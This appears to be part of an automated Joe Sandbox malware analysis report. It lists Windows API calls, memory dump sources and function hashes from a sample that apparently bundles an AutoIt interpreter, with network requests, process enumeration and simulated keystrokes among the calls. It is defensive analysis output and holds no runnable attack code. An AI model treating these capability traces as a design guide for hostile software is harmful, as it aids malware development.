• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C7A1E1,?,00000001), ref: 00C7B1B8
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C7A1E1,?,00000001), ref: 00C7B1FD
• AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00C7A1E1,?,00000001), ref: 00C7B212
• AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00C7A1E1,?,00000001), ref: 00C7B21D
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: a18eff551d593416754ad63eec5ab872c8bd661b45735e5905f3b072bafe3d73
• Instruction ID: 00ed2143544123f13f93befdc49ca51ffb7a425a282f27cdf7b671a591a92c96
• Opcode Fuzzy Hash: a18eff551d593416754ad63eec5ab872c8bd661b45735e5905f3b072bafe3d73
• Instruction Fuzzy Hash: 4F318D75500248BFDB10DF64DCC8BAE7BAABB52365F108415FA29DB191D7B8AF408F60
APIs
• _free.LIBCMT ref: 00C42C94
  • Part of subcall function 00C429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000), ref: 00C429DE
  • Part of subcall function 00C429C8: GetLastError.KERNEL32(00000000,?,00C4D7D1,00000000,00000000,00000000,00000000,?,00C4D7F8,00000000,00000007,00000000,?,00C4DBF5,00000000,00000000), ref: 00C429F0
• _free.LIBCMT ref: 00C42CA0
• _free.LIBCMT ref: 00C42CAB
• _free.LIBCMT ref: 00C42CB6
• _free.LIBCMT ref: 00C42CC1
• _free.LIBCMT ref: 00C42CCC
• _free.LIBCMT ref: 00C42CD7
• _free.LIBCMT ref: 00C42CE2
• _free.LIBCMT ref: 00C42CED
• _free.LIBCMT ref: 00C42CFB
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 207fdcf16463c1253bbb35480facc6dd79e20e2929c5767799fc778d761c133a
• Instruction ID: 087b1d99bcd284e0be25c70e43f2be8ebe240f51b084850040c20506c9e4ff83
• Opcode Fuzzy Hash: 207fdcf16463c1253bbb35480facc6dd79e20e2929c5767799fc778d761c133a
• Instruction Fuzzy Hash: A511B376100108BFDB02EF95D883CDD3BA9FF15350F9144A5FA489F222DA31EE50AB90
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C11459
• OleUninitialize.OLE32(?,00000000), ref: 00C114F8
• UnregisterHotKey.USER32(?), ref: 00C116DD
• DestroyWindow.USER32(?), ref: 00C524B9
• FreeLibrary.KERNEL32(?), ref: 00C5251E
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C5254B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: c7b552f04f3d74c19abaeb33e1e499975192f147519af3249ca3142d5018c94b
• Instruction ID: 7da344b8c766a0c4f43d7b9cc40758fc99ecfffd87bdd6359f57f2b3721dff44
• Opcode Fuzzy Hash: c7b552f04f3d74c19abaeb33e1e499975192f147519af3249ca3142d5018c94b
• Instruction Fuzzy Hash: 74D1BC35701222CFCB19EF15C495B69F7A0BF06700F1842ADE94A6B252DB30ED96EF54
APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C87FAD
• SetCurrentDirectoryW.KERNEL32(?), ref: 00C87FC1
• GetFileAttributesW.KERNEL32(?), ref: 00C87FEB
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00C88005
• SetCurrentDirectoryW.KERNEL32(?), ref: 00C88017
• SetCurrentDirectoryW.KERNEL32(?), ref: 00C88060
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C880B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: CurrentDirectory$AttributesFile
• String ID: *.*
• API String ID: 769691225-438819550
• Opcode ID: 30dc8d5c582354f01f95896aeca626b9c0399bce58cf5fb67b880b172a7aa092
• Instruction ID: 1ce880cb4faaf175f275de64010b958c5d46e5e41388156aca32179d5942dcd1
• Opcode Fuzzy Hash: 30dc8d5c582354f01f95896aeca626b9c0399bce58cf5fb67b880b172a7aa092
• Instruction Fuzzy Hash: 1C81C1725082019FCB20FF55C484AAEB3E8BF89318F64495EF899C7250EB34DE49DB56
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00C15C7A
  • Part of subcall function 00C15D0A: GetClientRect.USER32(?,?), ref: 00C15D30
  • Part of subcall function 00C15D0A: GetWindowRect.USER32(?,?), ref: 00C15D71
  • Part of subcall function 00C15D0A: ScreenToClient.USER32(?,?), ref: 00C15D99
• GetDC.USER32 ref: 00C546F5
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C54708
• SelectObject.GDI32(00000000,00000000), ref: 00C54716
• SelectObject.GDI32(00000000,00000000), ref: 00C5472B
• ReleaseDC.USER32(?,00000000), ref: 00C54733
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C547C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: 8fdf0554f8a12b4da143b9e2180e1fda7e98058257ce33448ecc21c74935aaec
• Instruction ID: 4278cf76160064294e5b95779ddeda37ba2f25251e521c6cd511628ad9d2a0cf
• Opcode Fuzzy Hash: 8fdf0554f8a12b4da143b9e2180e1fda7e98058257ce33448ecc21c74935aaec
• Instruction Fuzzy Hash: 9A71D239400205DFCF298F64C984BEA3BB1FF4A35AF144265FD655A1A6C73089D5EF50
APIs
• LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00C835E4
  • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
• LoadStringW.USER32(00CE2390,?,00000FFF,?), ref: 00C8360A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: LoadString$_wcslen
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 4099089115-2391861430
• Opcode ID: 04697506e4239be647532bacb26ee1ba34e4b015507e0888916495bba438cab2
• Instruction ID: 3d56f9a7c357d13eed1afdb36196e3a84f283064c5912e081cfbc445921151d9
• Opcode Fuzzy Hash: 04697506e4239be647532bacb26ee1ba34e4b015507e0888916495bba438cab2
• Instruction Fuzzy Hash: 2F517C71900249AADF14EBA0CD92EEEBB38EF05714F444125F615721A1EB306BD9FBA4
APIs
  • Part of subcall function 00C29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C29BB2
  • Part of subcall function 00C2912D: GetCursorPos.USER32(?), ref: 00C29141
  • Part of subcall function 00C2912D: ScreenToClient.USER32(00000000,?), ref: 00C2915E
  • Part of subcall function 00C2912D: GetAsyncKeyState.USER32(00000001), ref: 00C29183
  • Part of subcall function 00C2912D: GetAsyncKeyState.USER32(00000002), ref: 00C2919D
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00CA8B6B
• ImageList_EndDrag.COMCTL32 ref: 00CA8B71
• ReleaseCapture.USER32 ref: 00CA8B77
• SetWindowTextW.USER32(?,00000000), ref: 00CA8C12
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CA8C25
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00CA8CFF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 1924731296-2107944366
• Opcode ID: 54bd31b726a05514d695fd86e50b195f3887367218ba1c8b09cb1625d6bc9c9d
• Instruction ID: 7662064cce9d030325b3e2c67d781c811c42c19f4843cc37770c99a24ec77cf8
• Opcode Fuzzy Hash: 54bd31b726a05514d695fd86e50b195f3887367218ba1c8b09cb1625d6bc9c9d
• Instruction Fuzzy Hash: 97519A70204304AFD714DF14DC96BAE77E4FB8A718F000629F992972E2CB709A54DB62
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C8C272
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C8C29A
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C8C2CA
• GetLastError.KERNEL32 ref: 00C8C322
• SetEvent.KERNEL32(?), ref: 00C8C336
• InternetCloseHandle.WININET(00000000), ref: 00C8C341
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
• Opcode ID: ed741bc27f4c6564e2f885e80937a9beba1589095ce8c7123f0a41f1e70876a9
• Instruction ID: acd80eeffbfb9ef2759b601fa84571b321e498aad94bbb7fe3f998e9e4e2d19e
• Opcode Fuzzy Hash: ed741bc27f4c6564e2f885e80937a9beba1589095ce8c7123f0a41f1e70876a9
• Instruction Fuzzy Hash: B1316BB1600608AFD721AFA598C8BAB7BFCEB4A748B10851EF456D3250DB34DE059B74
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C53AAF,?,?,Bad directive syntax error,00CACC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C798BC
• LoadStringW.USER32(00000000,?,00C53AAF,?), ref: 00C798C3
  • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C79987
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: HandleLoadMessageModuleString_wcslen
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 858772685-4153970271
• Opcode ID: 1d704c6df06be654d75ac24afe2559653c40aa6242ed609af29a1408a694cddf
• Instruction ID: 38c1c07f5a12a2dd4208094548cd5fcc4386e03a94e9abae452c7ffe74779806
• Opcode Fuzzy Hash: 1d704c6df06be654d75ac24afe2559653c40aa6242ed609af29a1408a694cddf
• Instruction Fuzzy Hash: 1B219F3194021EABDF11EF90CC56EEE7775FF19304F04446AF619620A2EB71A658FB50
APIs
• GetParent.USER32 ref: 00C720AB
• GetClassNameW.USER32(00000000,?,00000100), ref: 00C720C0
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C7214D
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1290815626-3381328864
• Opcode ID: 5b6da6b951882f54b0f608cac06db99b046900c0e33308f9923cf85252afffc3
• Instruction ID: f70d2c4c38da9a05c22cb591a716ef7f677d4ab40e34257519503ab6d94eb39a
• Opcode Fuzzy Hash: 5b6da6b951882f54b0f608cac06db99b046900c0e33308f9923cf85252afffc3
• Instruction Fuzzy Hash: E8112976688706BBF6056621DC0BEAE379CEB05324F608027FB09A51D1FE616D016614
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bd5e4556ebef24e971687e57ba6ca0e9ef2e18baf40945c86cee1270c33ca44c
• Instruction ID: a2585ef04eb951dbbb6d72982fd4570435d36f54d3ab1c7e3340591c5d9ff7fc
• Opcode Fuzzy Hash: bd5e4556ebef24e971687e57ba6ca0e9ef2e18baf40945c86cee1270c33ca44c
• Instruction Fuzzy Hash: 4AC1E074D04259AFDB11DFA9D881BAEBBB0BF0D310F144099F824AB392C7758A46CB61
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: _free$EnvironmentVariable___from_strstr_to_strchr
• String ID:
• API String ID: 1282221369-0
• Opcode ID: 9df3e06131223831e2837b77ec67e26b05d49207c6f1315b61f0b39406d63356
• Instruction ID: 6a6df60b8a69b5f323c692be2769586903405e2a0275a056f6ee6eb79ff79ddf
• Opcode Fuzzy Hash: 9df3e06131223831e2837b77ec67e26b05d49207c6f1315b61f0b39406d63356
• Instruction Fuzzy Hash: 33616A71905300AFEB21AFF49CC1B6E7BA5FF01310F14416DF9519B292DB3A9E4597A0
APIs
• LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00C66890
• ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00C668A9
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C668B9
• ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00C668D1
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C668F2
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C28874,00000000,00000000,00000000,000000FF,00000000), ref: 00C66901
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C6691E
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00C28874,00000000,00000000,00000000,000000FF,00000000), ref: 00C6692D
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID:
• API String ID: 1268354404-0
• Opcode ID: 645bf1a16091b128eb09ca0c0372c82b8946d83a9a5d1c6d9b72e49f9e244cef
• Instruction ID: ab0e2f196258d975cdfcf8ac231eca985152ae88c91506de8539ec2a5750b0b0
• Opcode Fuzzy Hash: 645bf1a16091b128eb09ca0c0372c82b8946d83a9a5d1c6d9b72e49f9e244cef
• Instruction Fuzzy Hash: 6E519770A00209EFDB20CF25DC95FAE7BB5EB48764F10451CF922976A0DB70EA90DB50
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C8C182
• GetLastError.KERNEL32 ref: 00C8C195
• SetEvent.KERNEL32(?), ref: 00C8C1A9
  • Part of subcall function 00C8C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C8C272
  • Part of subcall function 00C8C253: GetLastError.KERNEL32 ref: 00C8C322
  • Part of subcall function 00C8C253: SetEvent.KERNEL32(?), ref: 00C8C336
  • Part of subcall function 00C8C253: InternetCloseHandle.WININET(00000000), ref: 00C8C341
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
• String ID:
• API String ID: 337547030-0
• Opcode ID: 3075cc331fd717c5f73d0793418f82b0ab5674fd047f3fa50a958fb1f24ede9a
• Instruction ID: d2c51bd56db1d81dc038c0dcc04fb8dfbadb800f5c09b8ba247af8cbb985e374
• Opcode Fuzzy Hash: 3075cc331fd717c5f73d0793418f82b0ab5674fd047f3fa50a958fb1f24ede9a
• Instruction Fuzzy Hash: 7E317E71100605AFDB21AFA5DC84B6BBBE8FF19308B00451DF96683660DB35E9149B74
APIs
  • Part of subcall function 00C73A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C73A57
  • Part of subcall function 00C73A3D: GetCurrentThreadId.KERNEL32 ref: 00C73A5E
  • Part of subcall function 00C73A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C725B3), ref: 00C73A65
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00C725BD
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C725DB
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C725DF
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00C725E9
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C72601
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C72605
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00C7260F
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C72623
• Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C72627
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
• Opcode ID: d9f5be0954dad50d09e4815232f2ce8dc6ddc934d306b0f6d93290f8082dcd72
• Instruction ID: 9139499922229377cd2ceaaa17a91a7d8182d9235869dd06d5015e47a0b4f733
• Opcode Fuzzy Hash: d9f5be0954dad50d09e4815232f2ce8dc6ddc934d306b0f6d93290f8082dcd72
• Instruction Fuzzy Hash: 5F01D431390610BBFB2067A99CCAF5D3F59DB4EB56F104001F318AF0D1C9E22445AA69
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C71449,?,?,00000000), ref: 00C7180C
• HeapAlloc.KERNEL32(00000000,?,00C71449,?,?,00000000), ref: 00C71813
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C71449,?,?,00000000), ref: 00C71828
• GetCurrentProcess.KERNEL32(?,00000000,?,00C71449,?,?,00000000), ref: 00C71830
• DuplicateHandle.KERNEL32(00000000,?,00C71449,?,?,00000000), ref: 00C71833
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C71449,?,?,00000000), ref: 00C71843
• GetCurrentProcess.KERNEL32(00C71449,00000000,?,00C71449,?,?,00000000), ref: 00C7184B
• DuplicateHandle.KERNEL32(00000000,?,00C71449,?,?,00000000), ref: 00C7184E
• CreateThread.KERNEL32(00000000,00000000,00C71874,00000000,00000000,00000000), ref: 00C71868
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: d9616213427ba3d3f3e94f1926e167d2d22922ead79c6cf9bd4540af8905f7d0
• Instruction ID: 9c52a490a50581d6f7a7321474b1ce357163cd5ed9608ceb0a3eeba52a503d36
• Opcode Fuzzy Hash: d9616213427ba3d3f3e94f1926e167d2d22922ead79c6cf9bd4540af8905f7d0
• Instruction Fuzzy Hash: 3401AC75340304BFE610ABA5DC89F9F3BACEB8AB15F014411FA05DB1A1DA7098108B20
                                                                                      APIs
                                                                                        • Part of subcall function 00C7D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00C7D501
                                                                                        • Part of subcall function 00C7D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00C7D50F
                                                                                        • Part of subcall function 00C7D4DC: CloseHandle.KERNEL32(00000000), ref: 00C7D5DC
